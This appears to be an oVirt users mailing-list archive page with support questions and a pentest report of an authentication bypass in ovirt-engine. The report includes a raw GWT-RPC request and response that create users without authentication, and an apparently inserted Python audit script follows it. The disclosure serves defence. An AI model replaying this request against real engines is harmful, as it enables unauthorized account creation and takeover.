The oVirt Counter
by Sandro Bonazzola
Hi, for those who remember the Linux Counter project: if you'd like others to know you're using oVirt and know some details about your deployment, here's a way to count you in:
https://ovirt.org/community/ovirt-counter.html
Enjoy!
--
Sandro Bonazzola
MANAGER, SOFTWARE ENGINEERING, EMEA R&D PERFORMANCE & SCALE
Red Hat EMEA <https://www.redhat.com/>
sbonazzo(a)redhat.com
*Red Hat respects your work life balance. Therefore there is no need to
answer this email out of your office hours.*
9 months
Internal pentest result : Ovirt-engine authentication bypass
by Jirka Simon
Hello oVirt community.
We had an internal pentest here and one finding is
*Ovirt-engine authentication bypass.*
Ovirt-engine, as deployed on ovirtm.XXX.XXX.cz, contains an authentication bypass. It is possible to directly call the CreateUserSessionCommand using runAction exposed by /ovirt-engine/webadmin/GenericApiGWTService.
*This action explicitly enables everyone to call it:*
```
@Override
protected boolean isUserAuthorizedToRunAction() {
    return true;
}
```
The behavior of this call differs based on the ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration option:
```
boolean externalSsoEnabled =
    EngineLocalConfig.getInstance().getBoolean("ENGINE_SSO_ENABLE_EXTERNAL_SSO");
DbUser dbUser = externalSsoEnabled ?
    dbUserDao.getByUsernameAndDomain(params.getPrincipalName(), authzName) :
    dbUserDao.getByExternalId(authzName, params.getPrincipalId());
```
If this option is enabled, usernames are used to locate users. If it's disabled, the externalId (which seems to be a randomly generated GUID) is used to locate users. If the specified user exists, a session is returned for the user. If the specified user doesn't exist, the user is created in the system. However, the user doesn't get assigned any group membership or rights, therefore the session creation fails because of the missing Login right.

The attempt to modify the users table can be seen in the SQL error message when attempting to use a null value for the username (as the endpoint uses GWT, the payload is mostly unreadable):
```
POST /ovirt-engine/webadmin/GenericApiGWTService HTTP/1.1
Host: ovirtm.xxx.xxx.cz
Cookie: JSESSIONID=wsp3WAo63LZGHfpB__stEt4lZ7z_zZycpzIprNlT.ovirtm45;
Content-Type: text/x-gwt-rpc; charset=utf-8
X-GWT-Module-Base: https://ovirtm.xxx.xx.cz/ovirt-engine/webadmin
X-GWT-Permutation: D7ECB5EF5E29205D18271CC08183A28D
Ovirt-Xsrf-Token: 4D87D03B631F8506FC668AA4C3FE3F443D723A9F379FDBB8B0D6DA0668650375
Content-Length: 869

7|0|23|https://ovirtm.xxx.xxx.cz/ovirt-engine/webadmin|0D1B4DEE9D1424E18C443F1CD1C11574|org.ovirt.engine.ui.frontend.gwtservices.GenericApiGWTService|runAction|org.ovirt.engine.core.common.action.ActionType/2930387551|org.ovirt.engine.core.common.action.ActionParametersBase/2903049429|org.ovirt.engine.core.common.action.CreateUserSessionParameters/2744166832|appScope|email|firstName|java.util.ArrayList/4159755760|lastName|namespace|principalId|admin|internal|sourceIp|ssoScope|ssoToken|org.ovirt.engine.core.common.action.ActionParametersBase$EndProcedure/1568822488|java.util.Collections$EmptyMap/4174664486|org.ovirt.engine.core.common.businessentities.VDSStatus/1938301532|org.ovirt.engine.core.compat.TransactionScopeOption/1475850853|1|2|3|4|2|5|6|5|201|7|0|8|9|10|11|0|12|13|14|0|16|17|18|19|0|5|0|0|0|0|20|1|0|11|0|0|0|0|0|0|21|0|-4|22|0|1|0|1|23|2|0|0|0|

HTTP/1.1 200 OK
Date: Fri, 15 Dec 2023 09:42:35 GMT
Server: Apache/2.4.37 (CentOS Stream) OpenSSL/1.1.1k mod_auth_gssapi/1.6.1
Expires: Thu, 14 Dec 2023 09:42:35 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: locale=cs_CZ; path=/; secure; HttpOnly; Max-Age=2147483647; Expires=Wed, 02-Jan-2092 12:56:42 GMT
X-XSS-PROTECTION: 1; MODE=BLOCK
Pragma: no-cache
X-FRAME-OPTIONS: SAMEORIGIN
Content-Disposition: attachment
X-CONTENT-TYPE-OPTIONS: NOSNIFF
Content-Length: 1794
Content-Type: application/json;charset=utf-8
Correlation-Id: 664c1c1f-9a75-4e14-94d7-aba12c5442f5
Connection: close

//OK[0,5,4,8,3,1,2,474,7,6,1,0,2,0,2,5,1,0,4,3,1,2,0,2,1,1,["org.ovirt.engine.core.common.action.ActionReturnValue/4163585948","java.util.ArrayList/4159755760","java.lang.String/2004016611","ENGINE","","org.ovirt.engine.core.common.errors.EngineFault/2377218566","org.ovirt.engine.core.common.errors.EngineError/2640515959","ERROR: null value in column \"username\" violates not-null constraint\n Detail: Failing row contains (6dad5e2f-7c95-4547-8f08-6936494c91b6, firstName, lastName, internal-authz, null, , email, , f, principalId, 2023-12-14 17:51:04.757747+01, 2023-12-15 10:42:35.125994+01, namespace, firstName(a)internal-authz).\n Where: SQL statement \"UPDATE users\n SET department \u003D v_department,\n domain \u003D v_domain,\n email \u003D v_email,\n name \u003D v_name,\n note \u003D v_note,\n surname \u003D v_surname,\n username \u003D v_username,\n external_id \u003D v_external_id,\n namespace \u003D v_namespace,\n _update_date \u003D CURRENT_TIMESTAMP\n WHERE external_id \u003D v_external_id\n AND domain \u003D v_domain\"\nPL/pgSQL function updateuserimpl(character varying,character varying,character varying,character varying,character varying,character varying,uuid,character varying,text,character varying) line 5 at SQL statement\nSQL statement \"SELECT UpdateUserImpl(\n v_department,\n v_domain,\n v_email,\n v_name,\n v_note,\n v_surname,\n v_user_id,\n v_username,\n v_external_id,\n v_namespace)\"\nPL/pgSQL function updateuser(character varying,character varying,character varying,character varying,character varying,character varying,uuid,character varying,boolean,text,character varying) line 3 at PERFORM"],0,7]
```
Fortunately, in our deployment the ENGINE_SSO_ENABLE_EXTERNAL_SSO configuration was set to false, so to create a session for the admin it would be necessary to know the admin user's externalId. However, as this is not the default configuration, it is possible that a later reinstallation could change the value. Still, it was possible to create users in the system without any authentication.
What is the best way to report this security issue?
Thank you
Jirka
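A defender-side check that follows from the report above: since the lookup key used by the unauthenticated CreateUserSession path depends on ENGINE_SSO_ENABLE_EXTERNAL_SSO, and a later reinstall can silently change it, an operator can audit the effective value across the engine's config fragments. This is an added example, not Jirka's report or oVirt's code; the file paths and names, the merge order (engine.conf.d/*.conf read in name order, last assignment wins) and the Boolean.parseBoolean-style parsing of the flag are assumptions.

```python
import re
import shlex
from typing import Dict, Optional

# Constructed sample config fragments (not from any real deployment). Paths are
# hypothetical; oVirt's EngineLocalConfig is assumed to read engine.conf.d/*.conf
# in name order with later files overriding earlier ones.
SAMPLE_CONF_FILES = {
    "/etc/ovirt-engine/engine.conf.d/10-setup-sso.conf":
        'ENGINE_SSO_CLIENT_ID="ovirt-engine-core"\n'
        'ENGINE_SSO_ENABLE_EXTERNAL_SSO="false"\n',
    "/etc/ovirt-engine/engine.conf.d/99-local.conf":
        "# override left behind by a later reinstall (constructed)\n"
        "ENGINE_SSO_ENABLE_EXTERNAL_SSO=true\n",
}

_ASSIGN = re.compile(r"^\s*([A-Za-z_][A-Za-z0-9_]*)=(.*)$")

def parse_conf(text: str) -> Dict[str, str]:
    """Parse shell-style KEY=value lines, dropping quotes and comments."""
    values: Dict[str, str] = {}
    for line in text.splitlines():
        m = _ASSIGN.match(line)
        if not m or line.lstrip().startswith("#"):
            continue
        parts = shlex.split(m.group(2), comments=True)
        values[m.group(1)] = parts[0] if parts else ""
    return values

def effective_config(files: Dict[str, str]) -> Dict[str, str]:
    """Merge fragments in file-name order; the last assignment wins."""
    merged: Dict[str, str] = {}
    for path in sorted(files):
        merged.update(parse_conf(files[path]))
    return merged

def external_sso_enabled(cfg: Dict[str, str]) -> Optional[bool]:
    """None if unset; otherwise Boolean.parseBoolean semantics (assumed)."""
    raw = cfg.get("ENGINE_SSO_ENABLE_EXTERNAL_SSO")
    return None if raw is None else raw.strip().lower() == "true"

def session_lookup_key(cfg: Dict[str, str]) -> str:
    """Which key the report says CreateUserSession would use to find a user."""
    flag = external_sso_enabled(cfg)
    if flag is None:
        return "unset"
    return "username+domain" if flag else "externalId+authz"

if __name__ == "__main__":
    cfg = effective_config(SAMPLE_CONF_FILES)
    print("ENGINE_SSO_ENABLE_EXTERNAL_SSO =", cfg.get("ENGINE_SSO_ENABLE_EXTERNAL_SSO"))
    print("user lookup key for CreateUserSession:", session_lookup_key(cfg))
```

With the constructed fragments the later file flips the flag to true, so the lookup falls back to username and domain, which is the case the report singles out as requiring no knowledge of a GUID.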
9 months, 1 week
can hosted engine deploy use local repository mirrors instead of internet ones?
by iucounu@gmail.com
Hi,
hosted-engine --deploy is failing as it is trying to connect to mirrorlist.centos.org:
[ INFO ] TASK [ovirt.ovirt.engine_setup : Install required packages for oVirt Engine deployment]
[ INFO ] ok: [localhost]
[ INFO ] TASK [ovirt.ovirt.engine_setup : Install oVirt Engine package]
[ ERROR ] fatal: [localhost -> 192.168.1.187]: FAILED! => {"changed": false, "msg": "Failed to download metadata for repo 'centos-ceph-pacific': Cannot prepare internal mirrorlist: Curl error (7): Couldn't connect to server for http://mirrorlist.centos.org/?release=8-stream&arch=x86_64&repo=storage-c... [Failed to connect to mirrorlist.centos.org port 80: Connection refused]", "rc": 1, "results": []}
Opening up access to the internet is a bureaucratic procedure for us, as would be for adding all the URLs to the proxy. We have a lot of repos mirrored locally - is it possible to get hosted-engine to use the local ones? Is there a list? I had a search for files that might contain these repos in various places, but to no avail.
Thanks for any help!
Cam
9 months, 3 weeks
Nested Virtualization in AMD Ryzen
by LS CHENG
Hi all
I am running OLVM 4.5. This is a test setup which was running on my old workstation with an Intel CPU under nested virtualization (with VMware Workstation); the host was running Windows 7 x64. I moved to an AMD Ryzen 7950X3D a couple of days ago, which runs Windows 11 x64 with 128GB memory, then moved the OLVM VMs from the old workstation to this new workstation.

The problem I face now is that the KVM host shows this error:
*Host kvm1 moved to Non-Operational state as host CPU type is not supported in this cluster compatibility version or is not supported at all*

I modified /etc/modprobe.d/kvm.conf and changed
options kvm_amd nested=0
to
options kvm_amd nested=1
and rebooted the KVM host, but I am still getting the same error. I verified the modification and it seems good:
[root@kvm1 ~]# cat /sys/module/kvm_amd/parameters/nested
1
In Windows 11 I have Hyper-V off and Memory Integrity is also off.
Am I missing any additional steps?
Thanks
9 months, 3 weeks
Upgrade from oVirt 4.5.4 to oVirt 4.5.5 - nothing provides selinux-policy >= 38.1.27-1.el9
by Devin A. Bougie
Hi, All. We're having trouble updating our 4.5.4 cluster to 4.5.5. We're running a self-hosted engine on fully updated AlmaLinux 9 hosts, and get the following errors when trying to upgrade to 4.5.5.
Any suggestions would be greatly appreciated.
Many thanks,
Devin
------
[root@lnxvirt01 ~]# dnf clean all
157 files removed
[root@lnxvirt01 ~]# dnf update
CLASSE Packages - x86_64 36 MB/s | 569 kB 00:00
CentOS-9-stream - Ceph Pacific 839 kB/s | 557 kB 00:00
CentOS-9-stream - Gluster 10 240 kB/s | 56 kB 00:00
CentOS-9 - RabbitMQ 38 354 kB/s | 104 kB 00:00
CentOS Stream 9 - NFV OpenvSwitch 923 kB/s | 154 kB 00:00
CentOS-9 - OpenStack yoga 5.7 MB/s | 3.0 MB 00:00
CentOS Stream 9 - OpsTools - collectd 228 kB/s | 51 kB 00:00
CentOS Stream 9 - oVirt 4.5 6.2 MB/s | 1.0 MB 00:00
oVirt upstream for CentOS Stream 9 - oVirt 4.5 1.0 kB/s | 7.5 kB 00:07
AlmaLinux 9 - AppStream 87 MB/s | 7.7 MB 00:00
AlmaLinux 9 - BaseOS 72 MB/s | 2.4 MB 00:00
AlmaLinux 9 - BaseOS - Debug 9.9 MB/s | 1.9 MB 00:00
AlmaLinux 9 - CRB 67 MB/s | 2.3 MB 00:00
AlmaLinux 9 - Extras 1.5 MB/s | 17 kB 00:00
AlmaLinux 9 - HighAvailability 29 MB/s | 434 kB 00:00
AlmaLinux 9 - NFV 56 MB/s | 1.0 MB 00:00
AlmaLinux 9 - Plus 2.5 MB/s | 22 kB 00:00
AlmaLinux 9 - ResilientStorage 30 MB/s | 446 kB 00:00
AlmaLinux 9 - RT 53 MB/s | 1.0 MB 00:00
AlmaLinux 9 - SAP 874 kB/s | 9.7 kB 00:00
AlmaLinux 9 - SAPHANA 1.3 MB/s | 13 kB 00:00
Error:
Problem 1: cannot install the best update candidate for package ovirt-vmconsole-1.0.9-1.el9.noarch
- nothing provides selinux-policy >= 38.1.27-1.el9 needed by ovirt-vmconsole-1.0.9-3.el9.noarch from centos-ovirt45
- nothing provides selinux-policy-base >= 38.1.27-1.el9 needed by ovirt-vmconsole-1.0.9-3.el9.noarch from centos-ovirt45
Problem 2: package ovirt-vmconsole-host-1.0.9-3.el9.noarch from centos-ovirt45 requires ovirt-vmconsole = 1.0.9-3.el9, but none of the providers can be installed
- cannot install the best update candidate for package ovirt-vmconsole-host-1.0.9-1.el9.noarch
- nothing provides selinux-policy >= 38.1.27-1.el9 needed by ovirt-vmconsole-1.0.9-3.el9.noarch from centos-ovirt45
- nothing provides selinux-policy-base >= 38.1.27-1.el9 needed by ovirt-vmconsole-1.0.9-3.el9.noarch from centos-ovirt45
(try to add '--skip-broken' to skip uninstallable packages or '--nobest' to use not only best candidate packages)
------
9 months, 3 weeks
Major screwup and now I can't bring anything up
by John Florian
I have a small home oVirt 4.5 deployment that was struggling a bit and I think I've only made things worse. I was seeing some SSL errors in various places but couldn't find any evidence of an expired cert, though maybe I overlooked something. At present, it looks like the most immediate problem is that the engine.log is showing SyncNetworkProviderCommand failing with EngineException: (Failed with error Unsupported or unrecognized SSL message and code 5050). For now, I'm only concerning myself with one Host that had been running VMs until I tried restarting everything from a power off. I take it that the sync failure prevents this Host from becoming active.
I had successfully been using this setup for many years. I do have my own web cert on the engine signed by my CA. While I was getting this same "code 5050" error before with things like ovirt-imageio (which is what prompted my initial digging), now I'm afraid I've only made things more complex. See, I was running FreeIPA on a pair of VMs. In the past, this pair of VMs would auto-start once the oVirt Engine and Hosts were going and I had no issue. But now I wonder to what extent OCSP being unreachable might affect the SSL errors.
What's the best/easiest/safest way out of this mess? Should I just wipe ovirt-engine of all the non-rpm provided files in /etc/pki/ovirt-engine/ and redo the engine-setup? I'm afraid of making things worse before I begin attempting that.
9 months, 3 weeks
Re: [ovirt-devel] Foreman needs a release of ovirt-engine-sdk-ruby
by Guillaume Pavese
We were just starting to depend on this workflow...
On Fri, Jan 26, 2024 at 2:02 PM Ewoud Kohl van Wijngaarden <
ewoud+ovirt(a)kohlvanwijngaarden.nl> wrote:
> Hello everyone,
>
> Foreman is a bit late in updating Ruby to a newer version. Looking ahead
> we're aiming at Ruby 3.1+ but ovirt-engine-sdk-ruby doesn't compile on
> it.
>
> https://github.com/oVirt/ovirt-engine-sdk-ruby/pull/3 was merged in
> September 2022 and a request to release it was opened a year ago:
> https://github.com/oVirt/ovirt-engine-sdk-ruby/issues/4
>
> The Foreman community is currently discussing dropping oVirt support:
> https://community.theforeman.org/t/proposal-to-drop-support-for-ovirt/36324
>
> Is there anyone who can still perform this release, or should we proceed
> with removal?
>
> Regards,
> Ewoud Kohl van Wijngaarden
> _______________________________________________
> Devel mailing list -- devel(a)ovirt.org
> To unsubscribe send an email to devel-leave(a)ovirt.org
> Privacy Statement: https://www.ovirt.org/privacy-policy.html
> oVirt Code of Conduct:
> https://www.ovirt.org/community/about/community-guidelines/
> List Archives:
> https://lists.ovirt.org/archives/list/devel@ovirt.org/message/ESA4LFSQ5JP...
>
--
This message and all attachments (hereinafter the "message") are intended exclusively for their addressees and are confidential. If you receive this message by mistake, please destroy it and notify the sender immediately. Any use of this message not in keeping with its purpose, and any total or partial distribution or publication, is prohibited without express authorization. As the Internet cannot guarantee the integrity of this message, Interactiv-group (and its subsidiaries) accept(s) no liability for this message in the event that it has been altered. IT, ES, UK.
<https://interactiv-group.com/disclaimer.html>
9 months, 3 weeks
Cannot remove Snapshot. The VM is during a backup operation.
by and@missme.ro
Hello!
Running ovirt Version 4.5.5-1.el8
I had an issue with the iSCSI server during the backup and I have two VMs that cannot be backed up anymore by Veeam.
In the oVirt event log I have the following errors:
Snapshot 'Auto-generated for Backup VM' creation for VM 'dns-a' has been completed.
VDSM ovirt1-02 command StartNbdServerVDS failed: Bitmap does not exist: "{'reason': 'Bitmap does not exist in /rhev/data-center/mnt/blockSD/b2fa3469-a380-4180-a89a-43d65085d1b9/images/6a4de98a-b544-4df8-beb1-e560fd61c0e6/cdb26b8b-c447-48de-affa-d7f778aebac7', 'bitmap': '12d2fb20-74da-4e63-b240-f1a42210760c'}"
Transfer was stopped by system. Reason: failed to create a signed image ticket.
Image Download with disk dns-a_Disk1 was initiated by veeam@internal-authz
Image Download with disk dns-a_Disk1 was cancelled.
The error on the Veeam backup proxy:
dns-a: Unable to create image transfer: Reason: 'Operation Failed', Detail: '[]'
When trying to delete the snapshot from the administration interface I receive the following error in the web interface (and nothing gets logged in the event log)
Cannot remove Snapshot. The VM is during a backup operation.
How should I go about fixing this issue?
9 months, 3 weeks